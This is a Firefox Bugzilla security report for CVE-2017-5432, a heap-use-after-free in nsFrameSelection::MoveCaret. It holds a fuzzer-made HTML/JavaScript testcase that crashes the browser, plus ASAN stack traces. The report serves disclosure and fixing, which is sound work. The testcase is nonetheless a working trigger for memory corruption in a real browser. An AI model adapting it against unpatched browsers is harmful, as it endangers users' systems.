Closed
Bug 1346654
(CVE-2017-5432)
Opened 8 years ago
Closed 8 years ago
heap-use-after-free in nsFrameSelection::MoveCaret
Categories
(Core :: DOM: Selection, defect)
Core
DOM: Selection
Tracking
()
People
(Reporter: nils, Assigned: smaug)
Details
(Keywords: csectype-uaf, reporter-external, sec-high, Whiteboard: [adv-main53+][adv-esr52.1+][adv-esr45.9+][post-critsmash-triage])
Attachments
(1 file)
|
7.81 KB,
patch
|
ehsan.akhgari
:
review+
abillings
:
approval-mozilla-aurora+
abillings
:
approval-mozilla-beta+
jcristau
:
approval-mozilla-esr45+
jcristau
:
approval-mozilla-esr52+
abillings
:
sec-approval+
|
Details | Diff | Splinter Review |
The latest ASAN build of Firefox crashes when loading the following testcase. The testcase requires the fuzzPriv extension.
cript>
function start() {
o1=document.createElement('iframe');
o1.src="data:text/html,<div>";
o1.addEventListener('load', fun0,false);
document.body.appendChild(o1);
}
function fun0() {
a=o1.contentDocument.documentElement;
o91=document.createElement('textarea');
a.appendChild(o91);
a.style.position='absolute';
o91.focus();
o1.contentWindow.onresize=fun1;
o1.height='-8px';
fuzzPriv.trustedKeyEvent(a,'press',false,false,true,false,35,0);
}
function fun1() {
a.setAttribute('style','right:auto;');
a.animate([{textShadow: ''},{textShadow: '',}],20);
fuzzPriv.CC();
fuzzPriv.CC();
}
</script>
<body onload="start()"></body>
ASAN output:
=================================================================
==19751==ERROR: AddressSanitizer: heap-use-after-free on address 0x6110002f4638 at pc 0x7fc2c18ef7ec bp 0x7fff28c6f7b0 sp 0x7fff28c6f7a8
READ of size 8 at 0x6110002f4638 thread T0 (Web Content)
#0 0x7fc2c18ef7eb in nsFrameSelection::MoveCaret(nsDirection, bool, nsSelectionAmount, nsFrameSelection::CaretMovementStyle) /home/worker/workspace/build/src/layout/generic/nsSelection.cpp:972:8
#1 0x7fc2c0ee9be3 in mozilla::SelectionMoveCommands::DoCommand(char const*, nsISupports*) /home/worker/workspace/build/src/editor/libeditor/EditorCommands.cpp:892:14
#2 0x7fc2bf247366 in nsControllerCommandTable::DoCommand(char const*, nsISupports*) /home/worker/workspace/build/src/dom/commandhandler/nsControllerCommandTable.cpp:147:10
#3 0x7fc2bf23dd2a in nsBaseCommandController::DoCommand(char const*) /home/worker/workspace/build/src/dom/commandhandler/nsBaseCommandController.cpp:136:10
#4 0x7fc2c091c3a8 in nsXBLPrototypeHandler::DispatchXBLCommand(mozilla::dom::EventTarget*, nsIDOMEvent*) /home/worker/workspace/build/src/dom/xbl/nsXBLPrototypeHandler.cpp:498:5
#5 0x7fc2c08f2fbf in nsXBLPrototypeHandler::ExecuteHandler(mozilla::dom::EventTarget*, nsIDOMEvent*) /home/worker/workspace/build/src/dom/xbl/nsXBLPrototypeHandler.cpp:221:12
#6 0x7fc2c0938fc8 in nsXBLWindowKeyHandler::WalkHandlersAndExecute(nsIDOMKeyEvent*, nsIAtom*, nsXBLPrototypeHandler*, unsigned int, mozilla::dom::IgnoreModifierState const&, bool, bool*) /home/worker/workspace/build/src/dom/xbl/nsXBLWindowKeyHandler.cpp:755:19
#7 0x7fc2c093359b in nsXBLWindowKeyHandler::WalkHandlersInternal(nsIDOMKeyEvent*, nsIAtom*, nsXBLPrototypeHandler*, bool, bool*) /home/worker/workspace/build/src/dom/xbl/nsXBLWindowKeyHandler.cpp:618:12
#8 0x7fc2c0932f57 in nsXBLWindowKeyHandler::WalkHandlers(nsIDOMKeyEvent*, nsIAtom*) /home/worker/workspace/build/src/dom/xbl/nsXBLWindowKeyHandler.cpp:298:3
#9 0x7fc2c0937705 in nsXBLWindowKeyHandler::HandleEvent(nsIDOMEvent*) /home/worker/workspace/build/src/dom/xbl/nsXBLWindowKeyHandler.cpp:477:10
#10 0x7fc2bf35fe89 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1123:16
#11 0x7fc2bf361e18 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1297:20
#12 0x7fc2bf34c80d in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:489:9
#13 0x7fc2bf34cc14 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:518:5
#14 0x7fc2bf34fdb7 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:822:9
#15 0x7fc2bf352207 in mozilla::EventDispatcher::DispatchDOMEvent(nsISupports*, mozilla::WidgetEvent*, nsIDOMEvent*, nsPresContext*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:891:12
#16 0x7fc2bd6b1cc1 in nsINode::DispatchEvent(nsIDOMEvent*, bool*) /home/worker/workspace/build/src/dom/base/nsINode.cpp:1331:5
#17 0x7fc2bf36d2b4 in mozilla::dom::EventTarget::DispatchEvent(mozilla::dom::Event&, mozilla::dom::CallerType, mozilla::ErrorResult&) /home/worker/workspace/build/src/dom/events/EventTarget.cpp:73:9
#18 0x7fc2beab05a2 in mozilla::dom::EventTargetBinding::dispatchEvent(JSContext*, JS::Handle<JSObject*>, mozilla::dom::EventTarget*, JSJitMethodCallArgs const&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventTargetBinding.cpp:974:15
#19 0x7fc2beaad59f in mozilla::dom::EventTargetBinding::genericMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventTargetBinding.cpp:1150:13
#20 0x7fc2c4a2917f in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:282:15
#21 0x7fc2c4a2917f in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:448
#22 0x7fc2c4a0fc72 in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:499:12
#23 0x7fc2c4a0fc72 in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2954
#24 0x7fc2c49f52ab in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:394:12
#25 0x7fc2c4a29496 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:466:15
#26 0x7fc2c4a29b72 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:512:10
#27 0x7fc2c53fea93 in JS_CallFunctionValue(JSContext*, JS::Handle<JSObject*>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2828:12
#28 0x7fc2bc2d2c39 in xpc::FunctionForwarder(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/xpconnect/src/ExportHelpers.cpp:319:18
#29 0x7fc2c4a2917f in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:282:15
#30 0x7fc2c4a2917f in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:448
#31 0x7fc2c4a0fc72 in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:499:12
#32 0x7fc2c4a0fc72 in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2954
#33 0x7fc2c49f52ab in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:394:12
#34 0x7fc2c4a29496 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:466:15
#35 0x7fc2c4a29b72 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:512:10
#36 0x7fc2c540084c in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2887:12
#37 0x7fc2be9da202 in mozilla::dom::EventListener::HandleEvent(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, mozilla::ErrorResult&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventListenerBinding.cpp:47:8
#38 0x7fc2bf35fe4e in HandleEvent<mozilla::dom::EventTarget *> /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventListenerBinding.h:65:12
#39 0x7fc2bf35fe4e in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1119
#40 0x7fc2bf361e18 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1297:20
#41 0x7fc2bf34c4f3 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:465:5
#42 0x7fc2bf34fdb7 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:822:9
#43 0x7fc2bd289b5e in nsGlobalWindow::PostHandleEvent(mozilla::EventChainPostVisitor&) /home/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:3804:7
#44 0x7fc2bf34c605 in PostHandleEvent /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:416:3
#45 0x7fc2bf34c605 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:468
#46 0x7fc2bf34cc14 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:518:5
#47 0x7fc2bf34fdb7 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:822:9
#48 0x7fc2c15b7616 in nsDocumentViewer::LoadComplete(nsresult) /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1043:7
#49 0x7fc2c3a8a6ca in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7642:5
#50 0x7fc2c3a86384 in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7436:7
#51 0x7fc2c3a8dd8f in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7333:13
#52 0x7fc2bc57e9d0 in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:1258:3
#53 0x7fc2bc57d968 in nsDocLoader::doStopDocumentLoad(nsIRequest*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:842:5
#54 0x7fc2bc57a6c6 in nsDocLoader::DocLoaderIsEmpty(bool) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:732:9
#55 0x7fc2bc57c7c4 in nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:614:5
#56 0x7fc2bc57d37c in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:470:14
#57 0x7fc2bacc7c2b in mozilla::net::nsLoadGroup::RemoveRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/netwerk/base/nsLoadGroup.cpp:634:18
#58 0x7fc2bd5ea76b in nsDocument::DoUnblockOnload() /home/worker/workspace/build/src/dom/base/nsDocument.cpp:8863:7
#59 0x7fc2bd5ea30b in nsDocument::UnblockOnload(bool) /home/worker/workspace/build/src/dom/base/nsDocument.cpp:8789:9
#60 0x7fc2bd5c033c in nsDocument::DispatchContentLoadedEvents() /home/worker/workspace/build/src/dom/base/nsDocument.cpp:5294:3
#61 0x7fc2bd690062 in applyImpl<nsDocument, void (nsDocument::*)()> /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:855:12
#62 0x7fc2bd690062 in apply<nsDocument, void (nsDocument::*)()> /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:861
#63 0x7fc2bd690062 in mozilla::detail::RunnableMethodImpl<nsDocument*, void (nsDocument::*)(), true, false>::Run() /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:890
#64 0x7fc2baad4632 in mozilla::ValidatingDispatcher::Runnable::Run() /home/worker/workspace/build/src/xpcom/threads/Dispatcher.cpp:257:21
#65 0x7fc2bab091b2 in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1264:7
#66 0x7fc2bab05a60 in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:389:10
#67 0x7fc2bb917cbf in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:96:21
#68 0x7fc2bb8898c8 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:3
#69 0x7fc2bb8898c8 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
#70 0x7fc2bb8898c8 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
#71 0x7fc2c0d75bcf in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:3
#72 0x7fc2c45b6467 in XRE_RunAppShell() /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:854:12
#73 0x7fc2bb8898c8 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:3
#74 0x7fc2bb8898c8 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
#75 0x7fc2bb8898c8 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
#76 0x7fc2c45b5e69 in XRE_InitChildProcess(int, char**, XREChildData const*) /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:686:7
#77 0x4e01b6 in content_process_main /home/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:64:19
#78 0x4e01b6 in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:286
#79 0x7fc2d5fc382f in __libc_start_main /build/glibc-t3gR2i/glibc-2.23/csu/../csu/libc-start.c:291
#80 0x41c3d8 in _start (/home/nils/fuzzer3/firefox/firefox+0x41c3d8)
0x6110002f4638 is located 184 bytes inside of 232-byte region [0x6110002f4580,0x6110002f4668)
freed by thread T0 (Web Content) here:
#0 0x4b2b2b in __interceptor_free /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:38:3
#1 0x7fc2ba9a7344 in SnowWhiteKiller::~SnowWhiteKiller() /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2664:9
#2 0x7fc2ba9a6f36 in nsCycleCollector::FreeSnowWhite(bool) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2839:3
#3 0x7fc2ba9ae2f5 in nsCycleCollector::BeginCollection(ccType, nsICycleCollectorListener*) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3839:3
#4 0x7fc2ba9adab0 in nsCycleCollector::Collect(ccType, js::SliceBudget&, nsICycleCollectorListener*, bool) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3661:9
#5 0x7fc2ba9b0994 in nsCycleCollector_collect(nsICycleCollectorListener*) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:4157:3
#6 0x7fc2bd6cea00 in nsJSContext::CycleCollectNow(nsICycleCollectorListener*, int) /home/worker/workspace/build/src/dom/base/nsJSEnvironment.cpp:1452:3
#7 0x7fc2bd2273fd in nsDOMWindowUtils::CycleCollect(nsICycleCollectorListener*, int) /home/worker/workspace/build/src/dom/base/nsDOMWindowUtils.cpp:1339:3
#8 0x7fc2bab24901 in NS_InvokeByIndex /home/worker/workspace/build/src/xpcom/reflect/xptcall/md/unix/xptcinvoke_asm_x86_64_unix.S:115
#9 0x7fc2bc3941a7 in Invoke /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:2010:12
#10 0x7fc2bc3941a7 in Call /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1329
#11 0x7fc2bc3941a7 in XPCWrappedNative::CallMethod(XPCCallContext&, XPCWrappedNative::CallMode) /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1296
#12 0x7fc2bc39bb1b in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNativeJSOps.cpp:983:12
#13 0x7fc2c4a2917f in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:282:15
#14 0x7fc2c4a2917f in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:448
#15 0x7fc2c4a0fc72 in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:499:12
#16 0x7fc2c4a0fc72 in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2954
#17 0x7fc2c49f52ab in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:394:12
#18 0x7fc2c4a29496 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:466:15
#19 0x7fc2c4a29b72 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:512:10
#20 0x7fc2c53fea93 in JS_CallFunctionValue(JSContext*, JS::Handle<JSObject*>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2828:12
#21 0x7fc2bc2d2c39 in xpc::FunctionForwarder(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/xpconnect/src/ExportHelpers.cpp:319:18
#22 0x7fc2c4a2917f in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:282:15
#23 0x7fc2c4a2917f in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:448
#24 0x7fc2c4a0fc72 in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:499:12
#25 0x7fc2c4a0fc72 in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2954
#26 0x7fc2c49f52ab in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:394:12
#27 0x7fc2c4a29496 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:466:15
#28 0x7fc2c4a29b72 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:512:10
#29 0x7fc2c56a971c in js::Wrapper::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) const /home/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:165:12
#30 0x7fc2c56603ae in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) const /home/worker/workspace/build/src/js/src/proxy/CrossCompartmentWrapper.cpp:353:14
#31 0x7fc2c5689189 in js::Proxy::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:464:12
#32 0x7fc2c568bab4 in js::proxy_Call(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:716:12
#33 0x7fc2c4a29227 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:282:15
#34 0x7fc2c4a29227 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:436
#35 0x7fc2c4a29b72 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:512:10
#36 0x7fc2c540084c in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2887:12
previously allocated by thread T0 (Web Content) here:
#0 0x4b2e4b in malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:52:3
#1 0x4e11bd in moz_xmalloc /home/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:83:17
#2 0x7fc2bf7c05f0 in operator new /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:194:12
#3 0x7fc2bf7c05f0 in nsTextEditorState::BindToFrame(nsTextControlFrame*) /home/worker/workspace/build/src/dom/html/nsTextEditorState.cpp:1170
#4 0x7fc2c1a0d804 in nsTextControlFrame::CreateAnonymousContent(nsTArray<nsIAnonymousContentCreator::ContentInfo>&) /home/worker/workspace/build/src/layout/forms/nsTextControlFrame.cpp:337:17
#5 0x7fc2c1560d07 in nsCSSFrameConstructor::GetAnonymousContent(nsIContent*, nsIFrame*, nsTArray<nsIAnonymousContentCreator::ContentInfo>&) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:4224:17
#6 0x7fc2c1553c72 in nsCSSFrameConstructor::ProcessChildren(nsFrameConstructorState&, nsIContent*, nsStyleContext*, nsContainerFrame*, bool, nsFrameItems&, bool, PendingBinding*, nsIFrame*) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:10979:3
#7 0x7fc2c156a19b in nsCSSFrameConstructor::ConstructFrameFromItemInternal(nsCSSFrameConstructor::FrameConstructionItem&, nsFrameConstructorState&, nsContainerFrame*, nsFrameItems&) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:4079:9
#8 0x7fc2c1575236 in nsCSSFrameConstructor::ConstructFramesFromItem(nsFrameConstructorState&, nsCSSFrameConstructor::FrameConstructionItemList::Iterator&, nsContainerFrame*, nsFrameItems&) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:6220:3
#9 0x7fc2c1554ab4 in ConstructFramesFromItemList /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:10760:5
#10 0x7fc2c1554ab4 in nsCSSFrameConstructor::ProcessChildren(nsFrameConstructorState&, nsIContent*, nsStyleContext*, nsContainerFrame*, bool, nsFrameItems&, bool, PendingBinding*, nsIFrame*) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:11064
#11 0x7fc2c155e634 in nsCSSFrameConstructor::ConstructBlock(nsFrameConstructorState&, nsIContent*, nsContainerFrame*, nsContainerFrame*, nsStyleContext*, nsContainerFrame**, nsFrameItems&, nsIFrame*, PendingBinding*) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:12081:3
#12 0x7fc2c155a0c4 in nsCSSFrameConstructor::ConstructDocElementFrame(mozilla::dom::Element*, nsILayoutHistoryState*) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:2643:5
#13 0x7fc2c157ec30 in nsCSSFrameConstructor::ContentRangeInserted(nsIContent*, nsIContent*, nsIContent*, nsILayoutHistoryState*, bool, TreeMatchContext*) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:7837:7
#14 0x7fc2c1576672 in ContentInserted /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:7722:10
#15 0x7fc2c1576672 in nsCSSFrameConstructor::RecreateFramesForContent(nsIContent*, bool, nsCSSFrameConstructor::RemoveFlags, nsIContent**) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:9826
#16 0x7fc2c14a5df9 in mozilla::RestyleManager::ProcessRestyledFrames(nsStyleChangeList&) /home/worker/workspace/build/src/layout/base/RestyleManager.cpp:1516:7
#17 0x7fc2c148a3ba in mozilla::GeckoRestyleManager::ComputeAndProcessStyleChange(nsIFrame*, nsChangeHint, mozilla::RestyleTracker&, nsRestyleHint, mozilla::RestyleHintData const&) /home/worker/workspace/build/src/layout/base/GeckoRestyleManager.cpp:3516:3
#18 0x7fc2c1489874 in mozilla::GeckoRestyleManager::RestyleElement(mozilla::dom::Element*, nsIFrame*, nsChangeHint, mozilla::RestyleTracker&, nsRestyleHint, mozilla::RestyleHintData const&) /home/worker/workspace/build/src/layout/base/GeckoRestyleManager.cpp:152:5
#19 0x7fc2c151787e in ProcessOneRestyle /home/worker/workspace/build/src/layout/base/RestyleTracker.cpp:95:5
#20 0x7fc2c151787e in mozilla::RestyleTracker::DoProcessRestyles() /home/worker/workspace/build/src/layout/base/RestyleTracker.cpp:262
#21 0x7fc2c148dbef in ProcessRestyles /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/GeckoRestyleManager.h:386:7
#22 0x7fc2c148dbef in mozilla::GeckoRestyleManager::ProcessPendingRestyles() /home/worker/workspace/build/src/layout/base/GeckoRestyleManager.cpp:505
#23 0x7fc2c14dae10 in ProcessPendingRestyles /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RestyleManagerInlines.h:44:3
#24 0x7fc2c14dae10 in mozilla::PresShell::DoFlushPendingNotifications(mozilla::ChangesToFlush) /home/worker/workspace/build/src/layout/base/PresShell.cpp:4184
#25 0x7fc2bd5e351e in FlushPendingNotifications /home/worker/workspace/build/src/obj-firefox/dist/include/nsIPresShell.h:599:5
#26 0x7fc2bd5e351e in nsDocument::FlushPendingNotifications(mozilla::FlushType) /home/worker/workspace/build/src/dom/base/nsDocument.cpp:8007
#27 0x7fc2bd62bd6e in nsFocusManager::CheckIfFocusable(nsIContent*, unsigned int) /home/worker/workspace/build/src/dom/base/nsFocusManager.cpp:1550:3
#28 0x7fc2bd62840c in nsFocusManager::SetFocusInner(nsIContent*, int, bool, bool) /home/worker/workspace/build/src/dom/base/nsFocusManager.cpp:1180:41
#29 0x7fc2bd62b7ae in nsFocusManager::SetFocus(nsIDOMElement*, unsigned int) /home/worker/workspace/build/src/dom/base/nsFocusManager.cpp:484:3
#30 0x7fc2bd3b892f in mozilla::dom::Element::Focus(mozilla::ErrorResult&) /home/worker/workspace/build/src/dom/base/Element.cpp:311:14
#31 0x7fc2bec55ce8 in mozilla::dom::HTMLElementBinding::focus(JSContext*, JS::Handle<JSObject*>, nsGenericHTMLElement*, JSJitMethodCallArgs const&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/HTMLElementBinding.cpp:462:3
#32 0x7fc2bef5b617 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2953:13
#33 0x7fc2c4a2917f in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:282:15
